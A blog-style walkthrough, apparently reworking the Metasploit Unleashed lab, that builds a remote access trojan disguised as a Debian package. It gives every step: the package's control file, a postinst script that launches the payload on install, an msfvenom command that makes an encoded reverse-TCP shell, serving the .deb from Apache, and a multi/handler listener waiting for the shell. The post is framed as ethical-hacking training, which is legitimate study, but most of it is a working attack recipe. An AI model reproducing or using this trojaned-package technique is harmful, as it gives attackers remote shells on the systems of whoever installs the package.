The Metasploit Framework (MSF) includes a utility called MSFvenom. MSFvenom can be used to generate and encode various payloads. It is currently maintained by the folks at Rapid7. My heroes at Offensive Security wrote an awesome tutorial demonstrating how to use MSFvenom as part of their free, ethical-hacking course called Metasploit Unleashed. Yet, I’m not going to lie. I had a little bit of trouble understanding what was happening when I took the tutorial on as a practical exercise. I had even more difficulty when I actually tried getting everything to work. Fortunately, those frustrating moments motivated me to try harder and come up with better notes. Below is my take on the original demo.
The Metasploit Unleashed (MSFU) course is provided free of charge by Offensive Security in order to raise awareness for under privileged children in East Africa.
Using MSFvenom to Create a Remote Access Trojan (RAT)
Create the necessary directories
You will essentially need two main directories: one for the package files, another for the RAT.
mkdir thorse/ mkdir thorse/DEBIAN/ # will hold .deb package files mkdir thorse/usr/ mkdir thorse/usr/share/ # not required, but for fun below mkdir thorse/usr/local/ mkdir thorse/usr/local/bin/ # will hold your MSFvenom payload
Create the package files
The control file.
vim thorse/DEBIAN/control # required file
Package: thorse Version: 666 Maintainer: Odysseus Architecture: all Description: For wreckin decks!
A goofy banner.
vim thorse/usr/share/banner.txt # not required, but for fun
IT'S A TRAP! >>\. /_ )`. / _)`^)`. _.---. _ (_,' \ `^-)"" `.\ | | \ \ / | / \ /.___.'\ (\ (_ < ,"|| \ |`. \`-' \\ () )| )/ |_>|> /_] // /_] /_]
The post-install file.
vim thorse/DEBIAN/postinst # required
#!/bin/sh sudo chmod 2755 /usr/local/bin/thorse if [ $? -eq 0 ] then /usr/local/bin/thorse & cat /usr/share/banner.txt # not required fi
chmod 755 thorse/DEBIAN/postinst
Generate the payload
The exact command sentence is very long so I broke up here for readability.
msfvenom \ # main command -a x64 \ # CPU arch of target system --platform linux \ # OS of target system -p linux/x64/shell/reverse_tcp \ # payload LHOST=192.168.5.1 \ # local handler for target system LPORT=8888 \ # port for target to use upon exploitation -b "\x00" \ # bad bytes to avoid in generating in payload -f elf \ # format -e x64/xor # encoder -o thorse/usr/local/bin/thorse \ # output file; postinst must match file-path
Build the package (RAT)
Output will be a
dpkg --build thorse/
Get the RAT into position
Copy it to the default web server directory and restart the service as needed.
cp thorse.deb /var/www/html/ service apache2 restart
Start the RAT handler
Consider running your handler using
screen. If not, you’ll need to have a dedicated terminal window open while the handler is running.
msf > use multi/handler msf exploit(multi/handler) > set PAYLOAD linux/x64/shell/reverse_tcp msf exploit(multi/handler) > set LHOST 192.168.5.1 msf exploit(multi/handler) > set LPORT 8888 msf exploit(multi/handler) > run [*] Started reverse handler on 192.168.5.1:8888
For the RAT to work, it must be downloaded and then, installed on the target.
wget http://192.168.5.1/thorse.deb dpkg -i thorse.deb